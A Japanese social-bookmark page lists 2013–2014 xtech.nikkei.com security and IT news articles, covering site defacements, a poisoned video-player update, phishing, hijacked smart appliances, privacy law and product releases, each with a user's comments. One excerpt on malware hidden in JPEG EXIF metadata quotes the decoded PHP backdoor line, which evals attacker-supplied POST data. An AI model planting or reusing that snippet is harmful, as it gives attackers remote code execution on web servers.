タグ

ブックマーク / xtech.nikkei.com (584)

  • 角川のWebサイト改ざん事件で明らかになった“ハッカーの狙いは日本人”

    角川書店やアスキーメディアワークスなどのグループ企業を統括するKADOKAWAホールディングス(以下、KADOKAWA)のWebサイトが改ざんされた。改ざんは、Webサイトを閲覧した一般ユーザーを攻撃する狙いで、閲覧に使ったパソコン内のソフトウエアが古い場合、ハッカーが仕組んだ不正プログラムに攻撃され、オンラインバンキングのパスワードなどが盗み取られてしまう危険がある。 Webサイトが改ざんされていたのは、2014年1月7日の0時49分~1月8日の13時7分までの約1日半。この期間中に約1万のアクセスがあり、閲覧者がトロイの木馬に感染した可能性があるという。この事件ついて、KADOKAWA側が改ざんの事実を発表したのは、改ざんから9日以上が過ぎた1月16日の23時だった。なぜ発表が遅れたのだろうか。まずは、KADOKAWA広報へのインタビューを通して得た事実を基に、改ざんから発表までの時系

    角川のWebサイト改ざん事件で明らかになった“ハッカーの狙いは日本人”
    tsupo
    tsupo 2014/01/24
    サーバーのぜい弱性を突いた攻撃により浸入されていた / KADOKAWAのトップページの改ざんは、iframeによって犯人が用意した別のWebサイトへ飛ばす仕組み / 画面上には表示されないiframeのため、閲覧者は気づかない
  • もんじゅウイルス混入の原因か? ラックが韓国製動画再生ソフトのアップデートでウイルス確認

    ラックは2014年1月23日、韓国グレテックの動画再生ソフト「GOM Player」(ゴムプレーヤー)のアップデートを実行すると、ウイルスに感染する恐れがあると発表した。国内の複数の企業で感染が確認され、外部のサーバーと不正な通信を行った形跡が見つかったという。 GOM Playerは、単体で様々なファイル形式の動画を再生できることで定評があるフリーソフト。今回のウイルスに感染させられる攻撃では、GOM Playerのアップデート機能が悪用された。 GOM Playerは、起動時に「app.gomlab.com」というドメインのアップデートサーバーにアクセスして、設定ファイルを取得する。この内容によって、アップデートサーバーにソフトを更新するファイルを要求する。攻撃者は、何らかの方法でアップデートサーバーから別のサーバーに誘導して、偽の設定ファイルをダウンロードさせ、ウイルスに感染させた(

    もんじゅウイルス混入の原因か? ラックが韓国製動画再生ソフトのアップデートでウイルス確認
    tsupo
    tsupo 2014/01/24
    本件、もんじゅに関係あるのか。「ソフト名も公表できない」動画再生ソフトというのが、GOM Player かもしれないと // GOMのサーバーが受けた攻撃はDNSキャッシュポイズニングか、サーバー自体の改竄の可能性がある
  • スマホアプリの「プライバシーポリシー」、適切な場所への掲載は日本が49カ国中45位

    産業技術総合研究所の高木浩光主任研究員らの研究チームは2014年1月23日、日のスマホアプリの「プライバシーポリシー」が適切な場所に掲載されている割合は49カ国中45位にとどまることが分かったと発表(PDF)した。プライバシーポリシーは外部に自動的に送信する情報などを利用者に説明する。掲載内容が適切な様式で書いているか7カ国で比べても適切ではないという。 対象としたのは、Google Playで国や地域ごとに提供されるApp Annieの「無料アプリトップ500」ランキング掲載のアプリ。このうち、Google Playのデベロッパー欄にあるリンク先にプライバシーポリシーが存在する場合(X)と、「ウェブページにアクセス」リンクに示された開発会社のサイトにある場合(Y)、Google Playのアプリ内容を説明する自由記述欄に書かれている場合(Z)に分類。そのいずれにもない場合は「なし」とし

    スマホアプリの「プライバシーポリシー」、適切な場所への掲載は日本が49カ国中45位
    tsupo
    tsupo 2014/01/23
    産業技術総合研究所の高木浩光主任研究員らの研究チーム / (調査)対象としたのは、Google Playで国や地域ごとに提供されるApp Annieの「無料アプリトップ500」ランキング掲載のアプリ
  • 年明けから三菱東京UFJのフィッシングメールが出回る、偽サイトはいまだ存在

    三菱東京UFJ銀行をかたる偽メールが出回っている。同行は年明けから、フィッシングサイト(攻撃者が作成した偽のWebサイト)で個人情報を入力しないよう、Webページで注意を呼びかけている。 このフィッシングサイトは、同行のオリジナルサイトと比べて、見た目の違いがほとんどない(写真1、写真2)。明確に異なるのはURLだけだ。オリジナルのURLは、「https://entry11.bk.mufg.jp/」で始まるのに対して、フィッシングサイトのURLは「http://bk.mufg.jp.kss.cn.com/」で始まる。

    年明けから三菱東京UFJのフィッシングメールが出回る、偽サイトはいまだ存在
    tsupo
    tsupo 2014/01/21
    そういえば、今月はじめごろ、Spamフォルダにこのフィッシングメールがいくつか入ってた
  • テレビや冷蔵庫などスマート家電から大量不正メール送信、米社が確認

    米Proofpointは現地時間2014年1月17日、テレビや冷蔵庫などのスマート家電から大量の不正メールが送信されたことを確認したと発表した。「物のインターネット」を利用したサイバー攻撃の最初の事例の1つだとしている。 Proofpointによると、10万台以上のスマート家電がハッキングされ、75万通以上のフィッシングメールやスパムメール送信に使われた。乗っ取られたスマート家電には、家庭内ネットワークのルーター、マルチメディアセンター、インターネットテレビ、そして少なくとも1台の冷蔵庫が含まれるという。 攻撃が発生した期間は2013年12月23日から2014年1月6日で、世界中の企業および個人に対して、1日平均3回、大量の不正メールが一斉送信された。全不正メールのうち25%以上は、デスクトップやノートパソコン、モバイル端末といった従来デバイスを経由せず、スマート家電から送信されていた。

    テレビや冷蔵庫などスマート家電から大量不正メール送信、米社が確認
    tsupo
    tsupo 2014/01/20
    10万台以上のスマート家電がハッキング / 乗っ取られたスマート家電には、家庭内ネットワークのルーター、マルチメディアセンター、インターネットテレビ、そして少なくとも1台の冷蔵庫が含まれるという
  • 商品の機能が消えて無くなるとき

    商品の機能が消えて無くなるとき アマゾン、アップル、テスラ、そして21世紀の消費者を待ち受ける将来の大問題 ほんの少し前まで使っていた機能が、故障でもないのに、突然使えなくなる。こんなおかしなことが、最近の製品では起こり得るようになっています。それは、ネットワーク経由で製品の機能を遠隔からコントロールできるようになっているからです。都合の悪い機能は、突然使用停止させることもできるのです。ブランク氏は「21世紀の消費者製品憲章」が必要だとし、試案を提示しました。(ITpro) 21世紀の偉大なイノベーションの一つは、クラウドに接続され、自動的に更新や改良がなされる製品です。ソフトウエア製品では、ディスクやCDといった物理的なメディアで新しいバージョンを購入する時代は終わりました。ハードウエア製品では、新しい機能が自動的に追加され、時間が経つに連れ、製品が魔法のように改良されます。 一方、マイ

    商品の機能が消えて無くなるとき
    tsupo
    tsupo 2014/01/20
    アマゾン、グーグル、アップル、テスラの例 → 特にテスラの例はひどいかも。高いお金を払って購入した機能が、いくら安全確保のためとはいえ、何の告知もなく削除されるとか。告知と払い戻しが必要だと思う
  • テクマトリックス、ソース構造の可視化ソフトでバックグラウンド解析を可能に

    テクマトリックスは2014年1月17日、ソフトウエアの構造を可視化するソースコード解析ソフトの新版「Understand 3.1」(写真1)を販売開始した。1月24日に出荷を開始する。新版では、バックグラウンド解析により、解析中に他の操作が可能になった。価格(税別)は、マシン固定ライセンスが1台当たり19万8000円、同時使用ライセンスが同時1ユーザー当たり39万8000円。開発会社は、米SciTools。 Understandは、ソフトウエアの構造を可視化するソフト(関連記事:テクマトリックス、COBOLも読めるソース構造の可視化ソフト新版)。呼び出しや参照、クラスの構成、制御フローなどをグラフィカルに可視化する(Visio形式での出力も可能)。個々のエンティティーをクリックすれば、詳細なコードを参照できる。ソースコードの複雑度を70種類のコードメトリクスを用いて分析する機能も備えており

    テクマトリックス、ソース構造の可視化ソフトでバックグラウンド解析を可能に
    tsupo
    tsupo 2014/01/20
    Understandは、ソフトウエアの構造を可視化するソフト / 呼び出しや参照、クラスの構成、制御フローなどをグラフィカルに可視化(Visio形式での出力も可能) / コードメトリクス分析機能もあり
  • [高速化を突き詰める]リアルタイム・ビッディング、高頻度取引

    加速度的に処理性能の向上が続くコンピュータ。ネット上の取引業務への応用では、今や1秒間あたり何千回もの速さでの自動処理が可能だ。ネット広告のリアルタイム・ビッディング(RTB)や金融の高頻度取引(HFT)は、こうしたコンピュータの「究極の高速化」を生かした新ビジネス、新市場の典型例と言える。 新市場1:リアルタイム・ビッディング ネット広告の裏で高速取引 普段、目にするWebサイト。そこで表示されている広告は、実は裏で超高速のオークションを経たものかもしれない。 Webサイトを利用者が訪れた瞬間に、その利用者に広告を見せる権利を電子的な取引市場でリアルタイムにオークション形式で売り出し、コンピュータが数ミリ秒で入札して自動取引するRTB。この技術が普及し始めているのである(図1)。

    [高速化を突き詰める]リアルタイム・ビッディング、高頻度取引
    tsupo
    tsupo 2014/01/14
    Webサイトを利用者が訪れた瞬間に、その利用者に広告を見せる権利を電子的な取引市場でリアルタイムにオークション形式で売り出し、コンピュータが数ミリ秒で入札して自動取引するRTB / 東証のarrowhead + HFT
  • [続報]もんじゅPCは韓国と33回不正通信、動画再生フリーソフト更新が契機か

    高速増殖炉「もんじゅ」(福井県敦賀市)の従業員用パソコン1台がコンピュータウイルスに感染し、外部との不審な通信による情報漏洩が疑われている問題(速報記事)で、通信先は韓国とみられるIPアドレスのサーバーだったことが、2014年1月7日、もんじゅを運営する日原子力研究開発機構への取材で分かった。 ウイルスに感染したのは、もんじゅの発電課従業員が使用するパソコン。1月2日に、約90分間にわたって不審な通信が行われていた。その後の調べで、韓国とみられるIPアドレスのサーバーとの間で33回通信が行われていたと判明した。 ただし、同機構広報部報道課の説明によれば、現時点ではIPアドレスを確認しただけ。当に韓国のサーバーと通信していたか、さらにその先のサーバーに情報が送信されたかどうかなど、詳細はまだ明らかになっていないという。 ウイルスに感染したのは、動画再生用のフリーソフトを更新した時だった可

    [続報]もんじゅPCは韓国と33回不正通信、動画再生フリーソフト更新が契機か
    tsupo
    tsupo 2014/01/14
    高速増殖炉「もんじゅ」の従業員用パソコン1台がコンピュータウイルスに感染し、外部との不審な通信による情報漏洩が疑われている問題 / 通信先は韓国とみられるIPアドレス / 動画再生用のフリーソフトが感染源?
  • メタデータに埋め込まれたマルウエア

    今回は攻撃者による“だまし”に関するブログを中心に紹介する。最初は、JPEG画像のメタデータにマルウエアを仕込むケース。JPEG画像のメタデータにマルウエアを仕込んだPHPバックドアをスペインのドメイン(.es)で見つけたとして、ブログで注意を促している。同様の手口は、今年6月に米スキュリが報告している。 JPEGファイルのコードを見ると興味深い文字列が並んでおり、画像のEXIFデータと合致する。 JPEGファイルのコード 画像のEXIFデータ EXIFデータのModelo(モデル)情報とMarca(メーカー)情報に同じ文字列が確認できる。これを解読すると「if (isset($_POST["zz1"])) {eval(stripslashes($_POST["zz1"])); 」となり、POSTパラメータ「zz1」を通じて取得するいかなる数値も実行する。 コードの実行には、PHPの「ex

    メタデータに埋め込まれたマルウエア
    tsupo
    tsupo 2014/01/14
    画像のEXIFの「モデル情報」にPHPの実行コードを挿入する手口 / メールにZIP形式等のファイルではなく、コントロールパネル(CPL)ファイルが埋め込まれたRTF(リッチテキスト)を添付する手口
  • パケットが地球を1周するのにどのくらい時間がかかる?

    通信事業者が世界中に張り巡らせているバックボーンネットワークは、いくつもの経路があります。では、IPパケットが地球を1周するのに、どのくらい時間がかかるのでしょうか。 地球上の主要地点を結ぶバックボーンネットワークは、主に光ファイバーで構築されています。真空中の光の速さは毎秒30万km。赤道直下の地球の外周は4万kmです。単純計算で約0.13秒で地球を1周できるわけですが、バックボーンネットワークではそうなりません。赤道直下を1周するルートがないことが一つの理由です。 ここでは米ベライゾン・コミュニケーションズも利用している、「日→米国西海岸→米国東海岸→英国→インド→シンガポール→日」という地点を経由する全行程約5万kmのルートで考えてみます。このルートは主に海底ケーブルになっており、米国内だけ陸路を通ります。各中継地点は海底ケーブルの陸揚げポイントになっています。5万kmという距離

    パケットが地球を1周するのにどのくらい時間がかかる?
    tsupo
    tsupo 2014/01/10
    真空中の光の速さは毎秒30万km、地球の外周は4万km / 単純計算で約0.13秒で地球を1周 / バックボーンネットワークではそうならない / 全行程約5万km / 光ファイバーを伝わる光の速さは、真空中よりも遅くなる
  • ジョブズとはひと味違う経営者、アマゾン創業者ジェフ・ベゾスの冷徹さと未来を見る力

    iPhoneiPadなど相次ぎイノベーションを起こしたスティーブ・ジョブズが亡くなってから2年が過ぎ、次のイノベーターは誰か、先見性のあるビジョナリーは誰かという話題がネット上やマスコミでたびたび取り上げられる。ここで必ず名前が上がるのが、米アマゾン・ドット・コムの創業者、ジェフ・ベゾスCEO(最高経営責任者)だ。 ジェフ・ベゾスは1994年、ウォルストリートの金融会社を退職してアマゾンを起業した。当初は奥さんとエンジニアとたった3人でガレージで開業したが、そこから20年、いまや株式時価総額は約18兆円、社員数は世界で約9万人という大企業となった。日企業の時価総額と比べても、1位のトヨタ自動車の約22兆円と2位のソフトバンクの約11兆円の間に入るほどの規模にまで成長している。 もっとも、これほどの大きな会社であり、歴史があるのにもかかわらず、アマゾンの企業文化についても、経営者であるジ

    ジョブズとはひと味違う経営者、アマゾン創業者ジェフ・ベゾスの冷徹さと未来を見る力
    tsupo
    tsupo 2014/01/10
    まずは規模の小さな体力のない出版社から / その出版社の紙の本の推奨をやめる → 40%も売り上げが減り、30日もすると体力のない小さな出版社はアマゾンへの電子書籍の提供に応じざるをえなくなった
  • 個人情報保護法の見直し方針固まる

    政府のIT総合戦略部が開催する「パーソナルデータに関する検討会」が2013年12月10日、5回の審議を経て終了した。検討会で固まったデータ利活用ルールの見直し方針案は、12月中に政府方針として決定した上で、2015年1月には新ルールに基づく個人情報保護法の改正案を国会に提出する計画だ。

    個人情報保護法の見直し方針固まる
    tsupo
    tsupo 2013/12/24
    データ利活用を監視するプライバシーコミッショナーの設置 / マイナンバー制度に伴い発足する第三者組織「特定個人情報保護委員会」が受け皿 / 「識別非特定情報」、「非識別非特定情報」
  • 究極のインソーシング「ユーザーメード」、JALパイロットが手作りシステムで事故を防ぐ

    最近、「インソーシング」と呼ばれるシステム内製化の動きが活発だ。行き過ぎたアウトソーシングで不都合が生じ、「自社の事情に合致した情報システムは自ら作るしかない」と考える企業が増えているのだ(関連記事:インソーシングで好機をつかめ!これからのシステム内製術)。 この記事で紹介するのは、そのインソーシングの究極のミニマム形態である「ユーザーメード」の事例だ。主役は和田尚氏(次ページの写真1)。日航空(JAL)の社員(パイロット)である。開発したシステムは「JAL CB-CT」と呼ばれている。CB-CTは、Competency Based Check and Trainingの頭文字をつなげたもの。「能力を基盤とした検証と訓練」とでも訳せるだろうか。自社訓練と資格審査での使用を目的に、2013年4月から格的に稼働させている。

    究極のインソーシング「ユーザーメード」、JALパイロットが手作りシステムで事故を防ぐ
    tsupo
    tsupo 2013/12/20
    一つの重大事故の背後には29の軽微な事故があり、その背景には300の顕在化しない問題がある → 300の顕在化しない問題を集積・分析することで、一つの重大事故と29の軽微な事故を防ごう / 教官の評価標準化
  • [5]利用者の反発を抑える「3つの鉄則」

    消費者の「気持ち悪さ」なんて、制御しようがない。ビッグデータの価値を理解していない人の方が問題だ---。パーソナルデータを扱う企業の担当者から、こんな音が聞かれることもある。こうした担当者には、プライバシー保護を巡る騒動を通じて明らかになった「3つの鉄則」を是非覚えておいてほしい。この教訓を考慮に入れるだけで、利用者の反発はかなり抑えられる。 1つは、プライバシーへの感度は人それぞれ、という事実を認識し、プライバシーを気にする少数の利用者に配慮することだ(図C)。 誰しも、「この情報は使ってほしくない」と考える項目が一つくらいはある。オプトアウトなどの選択肢が無いことは、それ自身が強権的な印象を与え、「何に使われるか分からない、気持ち悪い」という感情を生んでしまう。利用者に選択肢を用意することは、信頼を得る上で重要な工夫といえる。 もう1つの鉄則は、「このスキームは、米国や欧州では通用す

    [5]利用者の反発を抑える「3つの鉄則」
    tsupo
    tsupo 2013/12/13
    「米国には、配慮のない企業を糾弾するプライバシー専門家が数多くいるほか、プライバシー保護の消費者団体も民間企業や政府機関に年間数十件もの訴訟を提起している」 ← 『日本は専門家が少なすぎる』説
  • 第7回 マイナンバーでは正確な文字表記ができない?

    内閣官房は2013年11月12日に、社会保障・税番号(マイナンバー)制度の中核となる「情報提供ネットワークシステム」の調達仕様書案を公開した。この仕様書案における、文字コード(符号化文字集合及び符号化方式)の部分には、様々な問題点が存在する。

    第7回 マイナンバーでは正確な文字表記ができない?
    tsupo
    tsupo 2013/12/11
    『本連載は第6回で終了の予定だったが、文字コードの専門家として看過できない状況であるため、あえて第7回として、マイナンバーの文字コードについて考察する』 / JIS X 0213:2012ではなくJIS X 0213:2004なのか、等
  • [3]個人情報とは、匿名化とは何か

    特集の第1回と第2回では、Suica履歴販売でJR東日が批判を浴びた要因と、日のプライバシー保護法制改革の動向について解説した。ただ、そもそも「個人情報」とは何なのか、そして「匿名化」とは何を指すのか。それを4つのQ&Aを通して説明する。パーソナルデータの利活用を推進するには、まずは、これらの概念を正確に理解しておかなければならない。 Q:そもそも、個人情報とはどこからどこまでを指すの? A:個人情報保護法における「個人情報」とは、特定の個人を識別できる情報を含むデータ全体を指す。氏名のように単体で個人を特定できる情報(以下、個人識別情報)のほか、他の情報と容易に照合でき、個人を識別できるデータが個人情報に当たる。 ここ数年、ブログやSNSを通じて個人が自らの行動を公開するようになり、「容易に照合できる」データが爆発的に増えている。例えば、交通機関の乗降履歴データベースを、あるブログに

    [3]個人情報とは、匿名化とは何か
    tsupo
    tsupo 2013/12/11
    プライバシーポリシーなど公の約束と異なる行為を企業が行った場合、米国のFTCには「欺瞞的行為」として重い行政処分を下す権限がある一方で、現状では日本の行政組織にはこうした強力な執行権限はない
  • ソフトの脆弱性や個人のパスワードが狙われた1年、提供者が迎えた転換点とは

    2013年は、個人のパスワードを狙った攻撃やソフトの脆弱性を執拗に突く攻撃などが相次ぎ、セキュリティにかかわる新たな課題が浮上した年だった。発生した事件を順番に振り返り分析すると、これらの中からサービスやソフトウエア提供者に見過ごせない大きな転換点が浮かび上がってきた。

    ソフトの脆弱性や個人のパスワードが狙われた1年、提供者が迎えた転換点とは
    tsupo
    tsupo 2013/12/10
    「ユーザー自身が脆弱性」
  • 1位賞金は180万円、サイボウズの脆弱性コンテストで19件の脆弱性見つかる

    サイボウズは2013年12月9日、同年11月に開催していた業務用クラウドサービスの脆弱性発見コンテスト「cybozu.com Security Challenge」の中間報告を公表した(プレスリリース、参考記事)。2週間のコンテスト期間内に、14人から計19件の脆弱性報告があったという。このうち、発見数の多さや速さを基に、10人に計300万円の報奨金を支払う。まだ集計中だが、優勝者は180万円を受け取れる見込みだ。

    1位賞金は180万円、サイボウズの脆弱性コンテストで19件の脆弱性見つかる
    tsupo
    tsupo 2013/12/10
    41件という報告数は、これまで同社の脆弱性報告窓口に届いていた件数の約1年半分に相当 / 最も苦労したのは、報告があった件が脆弱性か、セキュリティ上の脅威がないシステム不具合かを分類する作業
  • リコー、針を使わずに紙を綴じられるフルカラー複合機を発売

    リコーは2013年12月6日、フルカラー複合機の新機種として、連続複写速度が毎分25枚(A4ヨコ)の「RICOH MP C2503」と、同毎分18枚の「同C1803」を発表した。12月11日に販売を開始する。いずれも、A3型複合機(全18シリーズ)のうち、エントリークラスに位置する。特徴の一つは、針を使わずに紙を綴じる針なしステープル機構を初めて搭載したこと。

    リコー、針を使わずに紙を綴じられるフルカラー複合機を発売
    tsupo
    tsupo 2013/12/09
    特徴の一つである針なしステープル機構は、針を使わずに複数の紙を綴じて固定化する機構 / 最大で5枚までの紙を綴じられる